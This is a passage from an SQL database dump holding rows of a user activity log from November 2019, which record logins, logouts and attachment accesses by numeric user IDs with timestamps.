22:08:43',NULL),(22493,55,'Attachment',753,'2019-11-10 22:08:43','2019-11-10 22:08:43',NULL),(22494,55,'Attachment',755,'2019-11-10 22:08:46','2019-11-10 22:08:46',NULL),(22495,2,'Attachment',757,'2019-11-11 08:10:57','2019-11-11 08:10:57',NULL),(22496,2,'Attachment',29,'2019-11-11 08:10:58','2019-11-11 08:10:58',NULL),(22497,2,'Attachment',24,'2019-11-11 08:10:58','2019-11-11 08:10:58',NULL),(22498,2,'Attachment',416,'2019-11-11 08:10:58','2019-11-11 08:10:58',NULL),(22499,2,'Attachment',419,'2019-11-11 08:10:58','2019-11-11 08:10:58',NULL),(22500,2,'Attachment',181,'2019-11-11 08:10:58','2019-11-11 08:10:58',NULL),(22501,2,'Attachment',288,'2019-11-11 08:10:58','2019-11-11 08:10:58',NULL),(22502,49,'Login',49,'2019-11-11 08:11:14','2019-11-11 08:11:14',NULL),(22503,2,'Attachment',757,'2019-11-11 08:18:26','2019-11-11 08:18:26',NULL),(22504,2,'Attachment',24,'2019-11-11 08:18:26','2019-11-11 08:18:26',NULL),(22505,2,'Attachment',416,'2019-11-11 08:18:26','2019-11-11 08:18:26',NULL),(22506,2,'Attachment',419,'2019-11-11 08:18:26','2019-11-11 08:18:26',NULL),(22507,2,'Attachment',29,'2019-11-11 08:18:26','2019-11-11 08:18:26',NULL),(22508,2,'Attachment',288,'2019-11-11 08:18:26','2019-11-11 08:18:26',NULL),(22509,2,'Attachment',181,'2019-11-11 08:18:26','2019-11-11 08:18:26',NULL),(22510,2,'Attachment',757,'2019-11-11 08:18:36','2019-11-11 08:18:36',NULL),(22511,2,'Attachment',288,'2019-11-11 08:18:36','2019-11-11 08:18:36',NULL),(22512,2,'Attachment',181,'2019-11-11 08:18:36','2019-11-11 08:18:36',NULL),(22513,2,'Attachment',416,'2019-11-11 08:18:36','2019-11-11 08:18:36',NULL),(22514,2,'Attachment',419,'2019-11-11 08:18:36','2019-11-11 08:18:36',NULL),(22515,2,'Attachment',29,'2019-11-11 08:18:36','2019-11-11 08:18:36',NULL),(22516,2,'Attachment',24,'2019-11-11 08:18:36','2019-11-11 08:18:36',NULL),(22517,2,'Attachment',29,'2019-11-11 08:19:04','2019-11-11 08:19:04',NULL),(22518,2,'Attachment',757,'2019-11-11 08:19:04','2019-11-11 08:19:04',NULL),(22519,2,'Attachment',288,'2019-11-11 08:19:04','2019-11-11 08:19:04',NULL),(22520,2,'Attachment',416,'2019-11-11 08:19:04','2019-11-11 08:19:04',NULL),(22521,2,'Attachment',181,'2019-11-11 08:19:04','2019-11-11 08:19:04',NULL),(22522,2,'Attachment',24,'2019-11-11 08:19:04','2019-11-11 08:19:04',NULL),(22523,2,'Attachment',419,'2019-11-11 08:19:05','2019-11-11 08:19:05',NULL),(22524,2,'Attachment',288,'2019-11-11 08:20:10','2019-11-11 08:20:10',NULL),(22525,2,'Attachment',181,'2019-11-11 08:20:10','2019-11-11 08:20:10',NULL),(22526,2,'Attachment',29,'2019-11-11 08:20:10','2019-11-11 08:20:10',NULL),(22527,2,'Attachment',757,'2019-11-11 08:20:10','2019-11-11 08:20:10',NULL),(22528,2,'Attachment',24,'2019-11-11 08:20:10','2019-11-11 08:20:10',NULL),(22529,2,'Attachment',416,'2019-11-11 08:20:10','2019-11-11 08:20:10',NULL),(22530,2,'Attachment',419,'2019-11-11 08:20:10','2019-11-11 08:20:10',NULL),(22531,46,'Login',46,'2019-11-11 08:27:05','2019-11-11 08:27:05',NULL),(22532,2,'Attachment',757,'2019-11-11 08:30:56','2019-11-11 08:30:56',NULL),(22533,2,'Attachment',29,'2019-11-11 08:30:56','2019-11-11 08:30:56',NULL),(22534,2,'Attachment',24,'2019-11-11 08:30:56','2019-11-11 08:30:56',NULL),(22535,2,'Attachment',419,'2019-11-11 08:30:56','2019-11-11 08:30:56',NULL),(22536,2,'Attachment',416,'2019-11-11 08:30:56','2019-11-11 08:30:56',NULL),(22537,2,'Attachment',288,'2019-11-11 08:30:56','2019-11-11 08:30:56',NULL),(22538,2,'Attachment',181,'2019-11-11 08:30:56','2019-11-11 08:30:56',NULL),(22539,50,'Login',50,'2019-11-11 08:33:00','2019-11-11 08:33:00',NULL),(22540,2,'Attachment',757,'2019-11-11 08:37:56','2019-11-11 08:37:56',NULL),(22541,2,'Attachment',419,'2019-11-11 08:37:56','2019-11-11 08:37:56',NULL),(22542,2,'Attachment',416,'2019-11-11 08:37:56','2019-11-11 08:37:56',NULL),(22543,2,'Attachment',29,'2019-11-11 08:37:56','2019-11-11 08:37:56',NULL),(22544,2,'Attachment',24,'2019-11-11 08:37:56','2019-11-11 08:37:56',NULL),(22545,2,'Attachment',181,'2019-11-11 08:37:56','2019-11-11 08:37:56',NULL),(22546,50,'Login',50,'2019-11-11 08:38:02','2019-11-11 08:38:02',NULL),(22547,46,'Logout',46,'2019-11-11 08:46:46','2019-11-11 08:46:46',NULL),(22548,2,'Attachment',416,'2019-11-11 08:46:46','2019-11-11 08:46:46',NULL),(22549,2,'Attachment',757,'2019-11-11 08:46:46','2019-11-11 08:46:46',NULL),(22550,2,'Attachment',24,'2019-11-11 08:46:46','2019-11-11 08:46:46',NULL),(22551,2,'Attachment',29,'2019-11-11 08:46:46','2019-11-11 08:46:46',NULL),(22552,2,'Attachment',419,'2019-11-11 08:46:46','2019-11-11 08:46:46',NULL),(22553,2,'Attachment',181,'2019-11-11 08:46:47','2019-11-11 08:46:47',NULL),(22554,2,'Attachment',288,'2019-11-11 08:46:47','2019-11-11 08:46:47',NULL),(22555,49,'Login',49,'2019-11-11 08:47:31','2019-11-11 08:47:31',NULL),(22556,49,'Logout',49,'2019-11-11 08:54:59','2019-11-11 08:54:59',NULL),(22557,50,'Logout',50,'2019-11-11 08:55:01','2019-11-11 08:55:01',NULL),(22558,46,'Login',46,'2019-11-11 08:55:03','2019-11-11 08:55:03',NULL),(22559,50,'Login',50,'2019-11-11 08:55:55','2019-11-11 08:55:55',NULL),(22560,2,'Attachment',29,'2019-11-11 08:56:50','2019-11-11 08:56:50',NULL),(22561,2,'Attachment',24,'2019-11-11 08:56:50','2019-11-11 08:56:50',NULL),(22562,2,'Attachment',181,'2019-11-11 08:56:50','2019-11-11 08:56:50',NULL),(22563,2,'Attachment',416,'2019-11-11 08:56:50','2019-11-11 08:56:50',NULL),(22564,2,'Attachment',757,'2019-11-11 08:56:50','2019-11-11 08:56:50',NULL),(22565,2,'Attachment',419,'2019-11-11 08:56:50','2019-11-11 08:56:50',NULL),(22566,2,'Attachment',288,'2019-11-11 08:56:50','2019-11-11 08:56:50',NULL),(22567,66,'Login',66,'2019-11-11 08:59:26','2019-11-11 08:59:26',NULL),(22568,48,'Login',48,'2019-11-11 09:04:46','2019-11-11 09:04:46',NULL),(22569,46,'Login',46,'2019-11-11 09:12:40','2019-11-11 09:12:40',NULL),(22570,66,'Logout',66,'2019-11-11 09:18:14','2019-11-11 09:18:14',NULL),(22571,59,'Login',59,'2019-11-11 09:18:25','2019-11-11 09:18:25',NULL),(22572,48,'Logout',48,'2019-11-11 09:38:45','2019-11-11 09:38:45',NULL),(22573,52,'Login',52,'2019-11-11 09:38:49','2019-11-11 09:38:49',NULL),(22574,59,'Login',59,'2019-11-11 09:55:34','2019-11-11 09:55:34',NULL),(22575,46,'Logout',46,'2019-11-11 10:09:05','2019-11-11 10:09:05',NULL),(22576,2,'Attachment',757,'2019-11-11 10:09:05','2019-11-11 10:09:05',NULL),(22577,2,'Attachment',416,'2019-11-11 10:09:05','2019-11-11 10:09:05',NULL),(22578,2,'Attachment',29,'2019-11-11 10:09:05','2019-11-11 10:09:05',NULL),(22579,2,'Attachment',419,'2019-11-11 10:09:05','2019-11-11 10:09:05',NULL),(22580,2,'Attachment',181,'2019-11-11 10:09:05','2019-11-11 10:09:05',NULL),(22581,2,'Attachment',24,'2019-11-11 10:09:05','2019-11-11 10:09:05',NULL),(22582,2,'Attachment',288,'2019-11-11 10:09:05','2019-11-11 10:09:05',NULL),(22583,66,'Login',66,'2019-11-11 10:09:29','2019-11-11 10:09:29',NULL),(22584,46,'Logout',46,'2019-11-11 10:31:34','2019-11-11 10:31:34',NULL),(22585,64,'Login',64,'2019-11-11 10:32:04','2019-11-11 10:32:04',NULL),(22586,59,'Logout',59,'2019-11-11 10:36:55','2019-11-11 10:36:55',NULL),(22587,66,'Login',66,'2019-11-11 10:37:03','2019-11-11 10:37:03',NULL),(22588,2,'Attachment',29,'2019-11-11 11:12:11','2019-11-11 11:12:11',NULL),(22589,2,'Attachment',24,'2019-11-11 11:12:11','2019-11-11 11:12:11',NULL),(22590,2,'Attachment',419,'2019-11-11 11:12:11','2019-11-11 11:12:11',NULL),(22591,2,'Attachment',288,'2019-11-11 11:12:11','2019-11-11 11:12:11',NULL),(22592,2,'Attachment',416,'2019-11-11 11:12:11','2019-11-11 11:12:11',NULL),(22593,2,'Attachment',181,'2019-11-11 11:12:11','2019-11-11 11:12:11',NULL),(22594,48,'Login',48,'2019-11-11 11:12:37','2019-11-11 11:12:37',NULL),(22595,66,'Logout',66,'2019-11-11 11:26:26','2019-11-11 11:26:26',NULL),(22596,50,'Login',50,'2019-11-11 11:26:35','2019-11-11 11:26:35',NULL),(22597,50,'Login',50,'2019-11-11 12:29:45','2019-11-11 12:29:45',NULL),(22598,50,'Login',50,'2019-11-11 12:29:50','2019-11-11 12:29:50',NULL),(22599,50,'Login',50,'2019-11-11 12:33:53','2019-11-11 12:33:53',NULL),(22600,50,'Attachment',757,'2019-11-11 12:44:33','2019-11-11 12:44:33',NULL),(22601,50,'Attachment',24,'2019-11-11 12:44:33','2019-11-11 12:44:33',NULL),(22602,50,'Attachment',419,'2019-11-11 12:44:33','2019-11-11 12:44:33',NULL),(22603,50,'Attachment',416,'2019-11-11 12:44:33','2019-11-11 12:44:33',NULL),(22604,50,'Attachment',29,'2019-11-11 12:44:33','2019-11-11 12:44:33',NULL),(22605,50,'Attachment',288,'2019-11-11 12:44:33','2019-11-11 12:44:33',NULL),(22606,50,'Attachment',181,'2019-11-11 12:44:33','2019-11-11 12:44:33',NULL),(22607,50,'Attachment',541,'2019-11-11 14:20:06','2019-11-11 14:20:06',NULL),(22608,50,'Attachment',538,'2019-11-11 14:20:06','2019-11-11 14:20:06',NULL),(22609,50,'Attachment',403,'2019-11-11 14:20:06','2019-11-11 14:20:06',NULL),(22610,50,'Attachment',539,'2019-11-11 14:20:06','2019-11-11 14:20:06',NULL),(22611,50,'Attachment',535,'2019-11-11 14:20:06','2019-11-11 14:20:06',NULL),(22612,66,'Login',66,'2019-11-11 14:55:01','2019-11-11 14:55:01',NULL),(22613,65,'Login',65,'2019-11-11 14:58:09','2019-11-11 14:58:09',NULL),(22614,64,'Attachment',757,'2019-11-11 15:17:00','2019-11-11 15:17:00',NULL),(22615,64,'Attachment',29,'2019-11-11 15:17:00','2019-11-11 15:17:00',NULL),(22616,59,'Attachment',416,'2019-11-11 15:35:25','2019-11-11 15:35:25',NULL),(22617,59,'Attachment',29,'2019-11-11 15:35:25','2019-11-11 15:35:25',NULL),(22618,59,'Attachment',757,'2019-11-11 15:35:25','2019-11-11 15:35:25',NULL),(22619,59,'Attachment',419,'2019-11-11 15:35:25','2019-11-11 15:35:25',NULL),(22620,59,'Attachment',24,'2019-11-11 15:35:25','2019-11-11 15:35:25',NULL),(22621,59,'Attachment',288,'2019-11-11 15:35:25','2019-11-11 15:35:25',NULL),(22622,59,'Attachment',181,'2019-11-11 15:35:25','2019-11-11 15:35:25',NULL),(22623,50,'Login',50,'2019-11-11 15:51:03','2019-11-11 15:51:03',NULL),(22624,50,'Logout',50,'2019-11-11 15:51:38','2019-11-11 15:51:38',NULL),(22625,50,'Logout',50,'2019-11-11 15:51:45','2019-11-11 15:51:45',NULL),(22626,50,'Logout',50,'2019-11-11 15:51:56','2019-11-11 15:51:56',NULL),(22627,2,'Attachment',29,'2019-11-11 15:51:56','2019-11-11 15:51:56',NULL),(22628,2,'Attachment',757,'2019-11-11 15:51:56','2019-11-11 15:51:56',NULL),(22629,2,'Attachment',416,'2019-11-11 15:51:56','2019-11-11 15:51:56',NULL),(22630,2,'Attachment',419,'2019-11-11 15:51:56','2019-11-11 15:51:56',NULL),(22631,2,'Attachment',24,'2019-11-11 15:51:56','2019-11-11 15:51:56',NULL),(22632,2,'Attachment',288,'2019-11-11 15:51:56','2019-11-11 15:51:56',NULL),(22633,2,'Attachment',181,'2019-11-11 15:51:56','2019-11-11 15:51:56',NULL),(22634,58,'Login',58,'2019-11-11 15:52:07','2019-11-11 15:52:07',NULL),(22635,50,'Logout',50,'2019-11-11 15:59:12','2019-11-11 15:59:12',NULL),(22636,50,'Logout',50,'2019-11-11 15:59:16','2019-11-11 15:59:16',NULL),(22637,50,'Login',50,'2019-11-11 16:01:27','2019-11-11 16:01:27',NULL),(22638,50,'Logout',50,'2019-11-11 16:01:32','2019-11-11 16:01:32',NULL),(22639,53,'Login',53,'2019-11-11 16:02:16','2019-11-11 16:02:16',NULL),(22640,53,'Logout',53,'2019-11-11 16:02:28','2019-11-11 16:02:28',NULL),(22641,59,'Login',59,'2019-11-11 16:02:42','2019-11-11 16:02:42',NULL),(22642,66,'Logout',66,'2019-11-11 16:11:10','2019-11-11 16:11:10',NULL),(22643,2,'Attachment',419,'2019-11-11 16:11:10','2019-11-11 16:11:10',NULL),(22644,2,'Attachment',757,'2019-11-11 16:11:10','2019-11-11 16:11:10',NULL),(22645,2,'Attachment',288,'2019-11-11 16:11:10','2019-11-11 16:11:10',NULL),(22646,2,'Attachment',29,'2019-11-11 16:11:10','2019-11-11 16:11:10',NULL),(22647,2,'Attachment',181,'2019-11-11 16:11:10','2019-11-11 16:11:10',NULL),(22648,2,'Attachment',416,'2019-11-11 16:11:10','2019-11-11 16:11:10',NULL),(22649,2,'Attachment',24,'2019-11-11 16:11:10','2019-11-11 16:11:10',NULL),(22650,66,'Attachment',541,'2019-11-11 17:15:45','2019-11-11 17:15:45',NULL),(22651,66,'Attachment',755,'2019-11-11 17:17:03','2019-11-11 17:17:03',NULL),(22652,66,'Attachment',539,'2019-11-11 17:17:03','2019-11-11 17:17:03',NULL),(22653,50,'Attachment',958,'2019-11-11 17:24:53','2019-11-11 17:24:53',NULL),(22654,52,'Attachment',288,'2019-11-11 18:06:56','2019-11-11 18:06:56',NULL),(22655,52,'Attachment',29,'2019-11-11 18:12:58','2019-11-11 18:12:58',NULL),(22656,50,'Login',50,'2019-11-12 08:32:56','2019-11-12 08:32:56',NULL),(22657,49,'Login',49,'2019-11-12 08:33:15','2019-11-12 08:33:15',NULL),(22658,59,'Login',59,'2019-11-12 08:59:40','2019-11-12 08:59:40',NULL),(22659,50,'Login',50,'2019-11-12 09:21:57','2019-11-12 09:21:57',NULL),(22660,58,'Login',58,'2019-11-12 09:23:14','2019-11-12 09:23:14',NULL),(22661,49,'Attachment',956,'2019-11-12 10:21:06','2019-11-12 10:21:06',NULL),(22662,2,'Attachment',29,'2019-11-12 11:00:57','2019-11-12 11:00:57',NULL),(22663,2,'Attachment',181,'2019-11-12 11:00:57','2019-11-12 11:00:57',NULL),(22664,52,'Login',52,'2019-11-12 11:01:08','2019-11-12 11:01:08',NULL),(22665,64,'Login',64,'2019-11-12 16:24:57','2019-11-12 16:24:57',NULL),(22666,49,'Login',49,'2019-11-13 08:18:54','2019-11-13 08:18:54',NULL),(22667,50,'Login',50,'2019-11-13 08:19:21','2019-11-13 08:19:21',NULL),(22668,59,'Login',59,'2019-11-13 08:19:36','2019-11-13 08:19:36',NULL),(22669,59,'Logout',59,'2019-11-13 08:19:41','2019-11-13 08:19:41',NULL),(22670,59,'Login',59,'2019-11-13 08:19:53','2019-11-13 08:19:53',NULL),(22671,2,'Attachment',757,'2019-11-13 08:36:37','2019-11-13 08:36:37',NULL),(22672,2,'Attachment',29,'2019-11-13 08:36:37','2019-11-13 08:36:37',NULL),(22673,2,'Attachment',416,'2019-11-13 08:36:37','2019-11-13 08:36:37',NULL),(22674,2,'Attachment',24,'2019-11-13 08:36:37','2019-11-13 08:36:37',NULL),(22675,2,'Attachment',419,'2019-11-13 08:36:37','2019-11-13 08:36:37',NULL),(22676,2,'Attachment',288,'2019-11-13 08:36:37','2019-11-13 08:36:37',NULL),(22677,2,'Attachment',181,'2019-11-13 08:36:37','2019-11-13 08:36:37',NULL),(22678,46,'Login',46,'2019-11-13 08:40:17','2019-11-13 08:40:17',NULL),(22679,46,'Logout',46,'2019-11-13 08:40:26','2019-11-13 08:40:26',NULL),(22680,2,'Attachment',29,'2019-11-13 08:40:26','2019-11-13 08:40:26',NULL),(22681,2,'Attachment',757,'2019-11-13 08:40:26','2019-11-13 08:40:26',NULL),(22682,46,'Login',46,'2019-11-13 08:40:34','2019-11-13 08:40:34',NULL),(22683,49,'Login',49,'2019-11-13 08:42:49','2019-11-13 08:42:49',NULL),(22684,50,'Login',50,'2019-11-13 08:47:34','2019-11-13 08:47:34',NULL),(22685,50,'Logout',50,'2019-11-13 08:47:41','2019-11-13 08:47:41',NULL),(22686,65,'Login',65,'2019-11-13 08:50:46','2019-11-13 08:50:46',NULL),(22687,2,'Attachment',29,'2019-11-13 09:19:07','2019-11-13 09:19:07',NULL),(22688,2,'Attachment',181,'2019-11-13 09:19:07','2019-11-13 09:19:07',NULL),(22689,52,'Login',52,'2019-11-13 09:19:15','2019-11-13 09:19:15',NULL),(22690,59,'Login',59,'2019-11-13 10:14:35','2019-11-13 10:14:35',NULL),(22691,59,'Logout',59,'2019-11-13 10:19:27','2019-11-13 10:19:27',NULL),(22692,50,'Login',50,'2019-11-13 10:19:34','2019-11-13 10:19:34',NULL),(22693,64,'Login',64,'2019-11-13 14:42:28','2019-11-13 14:42:28',NULL),(22694,64,'Attachment',29,'2019-11-13 14:43:11','2019-11-13 14:43:11',NULL),(22695,64,'Attachment',757,'2019-11-13 14:43:11','2019-11-13 14:43:11',NULL),(22696,64,'Attachment',419,'2019-11-13 14:43:11','2019-11-13 14:43:11',NULL),(22697,64,'Attachment',24,'2019-11-13 14:43:11','2019-11-13 14:43:11',NULL),(22698,64,'Attachment',416,'2019-11-13 14:43:11','2019-11-13 14:43:11',NULL),(22699,64,'Attachment',181,'2019-11-13 14:43:11','2019-11-13 14:43:11',NULL),(22700,64,'Attachment',288,'2019-11-13 14:43:11','2019-11-13 14:43:11',NULL),(22701,64,'Login',64,'2019-11-13 14:46:18','2019-11-13 14:46:18',NULL),(22702,52,'Attachment',29,'2019-11-13 19:14:21','2019-11-13 19:14:21',NULL),(22703,52,'Attachment',181,'2019-11-13 19:14:21','2019-11-13 19:14:21',NULL),(22704,2,'Attachment',757,'2019-11-14 08:35:34','2019-11-14 08:35:34',NULL),(22705,2,'Attachment',416,'2019-11-14 08:35:34','2019-11-14 08:35:34',NULL),(22706,2,'Attachment',419,'2019-11-14 08:35:34','2019-11-14 08:35:34',NULL),(22707,2,'Attachment',29,'2019-11-14 08:35:34','2019-11-14 08:35:34',NULL),(22708,2,'Attachment',24,'2019-11-14 08:35:34','2019-11-14 08:35:34',NULL),(22709,2,'Attachment',288,'2019-11-14 08:35:34','2019-11-14 08:35:34',NULL),(22710,2,'Attachment',181,'2019-11-14 08:35:34','2019-11-14 08:35:34',NULL),(22711,46,'Login',46,'2019-11-14 08:35:53','2019-11-14 08:35:53',NULL),(22712,2,'Attachment',416,'2019-11-14 09:08:00','2019-11-14 09:08:00',NULL),(22713,2,'Attachment',29,'2019-11-14 09:08:00','2019-11-14 09:08:00',NULL),(22714,2,'Attachment',24,'2019-11-14 09:08:00','2019-11-14 09:08:00',NULL),(22715,2,'Attachment',757,'2019-11-14 09:08:00','2019-11-14 09:08:00',NULL),(22716,2,'Attachment',419,'2019-11-14 09:08:01','2019-11-14 09:08:01',NULL),(22717,2,'Attachment',288,'2019-11-14 09:08:01','2019-11-14 09:08:01',NULL),(22718,2,'Attachment',181,'2019-11-14 09:08:01','2019-11-14 09:08:01',NULL),(22719,2,'Attachment',29,'2019-11-14 10:22:58','2019-11-14 10:22:58',NULL),(22720,2,'Attachment',416,'2019-11-14 10:22:58','2019-11-14 10:22:58',NULL),(22721,2,'Attachment',419,'2019-11-14 10:22:59','2019-11-14 10:22:59',NULL),(22722,2,'Attachment',181,'2019-11-14 10:22:59','2019-11-14 10:22:59',NULL),(22723,50,'Login',50,'2019-11-14 10:23:27','2019-11-14 10:23:27',NULL),(22724,2,'Attachment',29,'2019-11-14 14:42:33','2019-11-14 14:42:33',NULL),(22725,2,'Attachment',419,'2019-11-14 14:42:33','2019-11-14 14:42:33',NULL),(22726,2,'Attachment',181,'2019-11-14 14:42:33','2019-11-14 14:42:33',NULL),(22727,50,'Login',50,'2019-11-14 17:11:52','2019-11-14 17:11:52',NULL),(22728,50,'Logout',50,'2019-11-14 17:11:57','2019-11-14 17:11:57',NULL),(22729,49,'Login',49,'2019-11-14 17:12:49','2019-11-14 17:12:49',NULL),(22730,49,'Attachment',549,'2019-11-14 17:29:15','2019-11-14 17:29:15',NULL),(22731,49,'Attachment',548,'2019-11-14 17:29:15','2019-11-14 17:29:15',NULL),(22732,49,'Attachment',554,'2019-11-14 17:29:15','2019-11-14 17:29:15',NULL),(22733,49,'Attachment',557,'2019-11-14 17:29:15','2019-11-14 17:29:15',NULL),(22734,49,'Attachment',553,'2019-11-14 17:29:15','2019-11-14 17:29:15',NULL),(22735,49,'Attachment',555,'2019-11-14 17:29:15','2019-11-14 17:29:15',NULL),(22736,49,'Attachment',551,'2019-11-14 17:29:15','2019-11-14 17:29:15',NULL),(22737,49,'Attachment',552,'2019-11-14 17:29:15','2019-11-14 17:29:15',NULL),(22738,49,'Attachment',559,'2019-11-14 17:29:15','2019-11-14 17:29:15',NULL),(22739,49,'Attachment',550,'2019-11-14 17:29:15','2019-11-14 17:29:15',NULL),(22740,49,'Attachment',547,'2019-11-14 17:29:15','2019-11-14 17:29:15',NULL),(22741,49,'Attachment',556,'2019-11-14 17:29:15','2019-11-14 17:29:15',NULL),(22742,2,'Attachment',29,'2019-11-15 10:14:02','2019-11-15 10:14:02',NULL),(22743,59,'Login',59,'2019-11-18 09:15:28','2019-11-18 09:15:28',NULL),(22744,50,'Login',50,'2019-11-18 09:16:17','2019-11-18 09:16:17',NULL),(22745,59,'Attachment',29,'2019-11-18 09:46:18','2019-11-18 09:46:18',NULL),(22746,59,'Logout',59,'2019-11-18 09:46:23','2019-11-18 09:46:23',NULL),(22747,50,'Login',50,'2019-11-18 09:46:28','2019-11-18 09:46:28',NULL),(22748,2,'Attachment',757,'2019-11-18 10:02:52','2019-11-18 10:02:52',NULL),(22749,2,'Attachment',181,'2019-11-18 10:02:52','2019-11-18 10:02:52',NULL),(22750,2,'Attachment',29,'2019-11-18 10:02:53','2019-11-18 10:02:53',NULL),(22751,2,'Attachment',416,'2019-11-18 10:02:53','2019-11-18 10:02:53',NULL),(22752,2,'Attachment',24,'2019-11-18 10:02:53','2019-11-18 10:02:53',NULL),(22753,2,'Attachment',288,'2019-11-18 10:02:53','2019-11-18 10:02:53',NULL),(22754,2,'Attachment',419,'2019-11-18 10:02:53','2019-11-18 10:02:53',NULL),(22755,59,'Login',59,'2019-11-18 10:58:32','2019-11-18 10:58:32',NULL),(22756,59,'Logout',59,'2019-11-18 10:58:38','2019-11-18 10:58:38',NULL),(22757,2,'Attachment',757,'2019-11-18 10:58:39','2019-11-18 10:58:39',NULL),(22758,2,'Attachment',29,'2019-11-18 10:58:39','2019-11-18 10:58:39',NULL),(22759,2,'Attachment',416,'2019-11-18 10:58:39','2019-11-18 10:58:39',NULL),(22760,2,'Attachment',24,'2019-11-18 10:58:39','2019-11-18 10:58:39',NULL),(22761,46,'Login',46,'2019-11-18 10:58:56','2019-11-18 10:58:56',NULL),(22762,2,'Attachment',29,'2019-11-18 11:09:45','2019-11-18 11:09:45',NULL),(22763,2,'Attachment',181,'2019-11-18 11:09:45','2019-11-18 11:09:45',NULL),(22764,49,'Login',49,'2019-11-18 11:09:58','2019-11-18 11:09:58',NULL),(22765,2,'Attachment',416,'2019-11-18 11:12:21','2019-11-18 11:12:21',NULL),(22766,2,'Attachment',757,'2019-11-18 11:12:21','2019-11-18 11:12:21',NULL),(22767,2,'Attachment',29,'2019-11-18 11:12:21','2019-11-18 11:12:21',NULL),(22768,2,'Attachment',24,'2019-11-18 11:12:21','2019-11-18 11:12:21',NULL),(22769,2,'Attachment',419,'2019-11-18 11:12:21','2019-11-18 11:12:21',NULL),(22770,2,'Attachment',288,'2019-11-18 11:12:21','2019-11-18 11:12:21',NULL),(22771,2,'Attachment',181,'2019-11-18 11:12:21','2019-11-18 11:12:21',NULL),(22772,50,'Login',50,'2019-11-18 11:12:34','2019-11-18 11:12:34',NULL),(22773,2,'Attachment',757,'2019-11-18 19:31:04','2019-11-18 19:31:04',NULL),(22774,2,'Attachment',24,'2019-11-18 19:31:05','2019-11-18 19:31:05',NULL),(22775,2,'Attachment',419,'2019-11-18 19:31:05','2019-11-18 19:31:05',NULL),(22776,2,'Attachment',181,'2019-11-18 19:31:05','2019-11-18 19:31:05',NULL),(22777,2,'Attachment',416,'2019-11-18 19:31:05','2019-11-18 19:31:05',NULL),(22778,2,'Attachment',288,'2019-11-18 19:31:05','2019-11-18 19:31:05',NULL),(22779,2,'Attachment',29,'2019-11-18 19:31:05','2019-11-18 19:31:05',NULL),(22780,2,'Attachment',538,'2019-11-18 19:31:06','2019-11-18 19:31:06',NULL),(22781,2,'Attachment',535,'2019-11-18 19:31:06','2019-11-18 19:31:06',NULL),(22782,2,'Attachment',539,'2019-11-18 19:31:06','2019-11-18 19:31:06',NULL),(22783,2,'Attachment',541,'2019-11-18 19:31:06','2019-11-18 19:31:06',NULL),(22784,2,'Attachment',403,'2019-11-18 19:31:06','2019-11-18 19:31:06',NULL),(22785,2,'Attachment',29,'2019-11-20 09:00:42','2019-11-20 09:00:42',NULL),(22786,2,'Attachment',757,'2019-11-20 09:00:42','2019-11-20 09:00:42',NULL),(22787,2,'Attachment',416,'2019-11-20 09:00:42','2019-11-20 09:00:42',NULL),(22788,2,'Attachment',419,'2019-11-20 09:00:42','2019-11-20 09:00:42',NULL),(22789,2,'Attachment',24,'2019-11-20 09:00:42','2019-11-20 09:00:42',NULL),(22790,2,'Attachment',288,'2019-11-20 09:00:42','2019-11-20 09:00:42',NULL),(22791,2,'Attachment',181,'2019-11-20 09:00:42','2019-11-20 09:00:42',NULL),(22792,49,'Login',49,'2019-11-20 09:01:38','2019-11-20 09:01:38',NULL),(22793,49,'Logout',49,'2019-11-20 10:32:58','2019-11-20 10:32:58',NULL),(22794,2,'Attachment',757,'2019-11-20 10:32:59','2019-11-20 10:32:59',NULL),(22795,2,'Attachment',29,'2019-11-20 10:32:59','2019-11-20 10:32:59',NULL),(22796,50,'Login',50,'2019-11-20 10:33:16','2019-11-20 10:33:16',NULL),(22797,46,'Login',46,'2019-11-20 11:07:36','2019-11-20 11:07:36',NULL),(22798,2,'Attachment',29,'2019-11-20 11:16:18','2019-11-20 11:16:18',NULL),(22799,2,'Attachment',757,'2019-11-20 11:16:18','2019-11-20 11:16:18',NULL),(22800,2,'Attachment',416,'2019-11-20 11:16:18','2019-11-20 11:16:18',NULL),(22801,2,'Attachment',24,'2019-11-20 11:16:18','2019-11-20 11:16:18',NULL),(22802,2,'Attachment',419,'2019-11-20 11:16:19','2019-11-20 11:16:19',NULL),(22803,2,'Attachment',288,'2019-11-20 11:16:19','2019-11-20 11:16:19',NULL),(22804,2,'Attachment',181,'2019-11-20 11:16:19','2019-11-20 11:16:19',NULL),(22805,50,'Login',50,'2019-11-20 11:16:36','2019-11-20 11:16:36',NULL),(22806,46,'Attachment',757,'2019-11-20 15:25:28','2019-11-20 15:25:28',NULL),(22807,46,'Attachment',24,'2019-11-20 15:25:28','2019-11-20 15:25:28',NULL),(22808,46,'Attachment',29,'2019-11-20 15:25:28','2019-11-20 15:25:28',NULL),(22809,46,'Attachment',416,'2019-11-20 15:25:28','2019-11-20 15:25:28',NULL),(22810,46,'Attachment',419,'2019-11-20 15:25:28','2019-11-20 15:25:28',NULL),(22811,46,'Attachment',288,'2019-11-20 15:25:28','2019-11-20 15:25:28',NULL),(22812,46,'Attachment',181,'2019-11-20 15:25:28','2019-11-20 15:25:28',NULL),(22813,50,'Logout',50,'2019-11-20 15:50:30','2019-11-20 15:50:30',NULL),(22814,2,'Attachment',757,'2019-11-20 15:50:30','2019-11-20 15:50:30',NULL),(22815,2,'Attachment',24,'2019-11-20 15:50:30','2019-11-20 15:50:30',NULL),(22816,2,'Attachment',29,'2019-11-20 15:50:30','2019-11-20 15:50:30',NULL),(22817,2,'Attachment',416,'2019-11-20 15:50:30','2019-11-20 15:50:30',NULL),(22818,49,'Login',49,'2019-11-20 15:50:37','2019-11-20 15:50:37',NULL),(22819,50,'Login',50,'2019-11-20 17:24:00','2019-11-20 17:24:00',NULL),(22820,64,'Login',64,'2019-11-20 17:47:37','2019-11-20 17:47:37',NULL),(22821,50,'Logout',50,'2019-11-20 17:59:50','2019-11-20 17:59:50',NULL),(22822,59,'Login',59,'2019-11-20 18:00:01','2019-11-20 18:00:01',NULL),(22823,63,'Login',63,'2019-11-20 18:17:26','2019-11-20 18:17:26',NULL),(22824,49,'Attachment',523,'2019-11-20 18:44:02','2019-11-20 18:44:02',NULL),(22825,63,'Login',63,'2019-11-21 08:12:28','2019-11-21 08:12:28',NULL),(22826,50,'Login',50,'2019-11-21 08:13:08','2019-11-21 08:13:08',NULL),(22827,49,'Login',49,'2019-11-21 08:14:19','2019-11-21 08:14:19',NULL),(22828,50,'Login',50,'2019-11-21 09:09:12','2019-11-21 09:09:12',NULL),(22829,46,'Login',46,'2019-11-21 09:39:55','2019-11-21 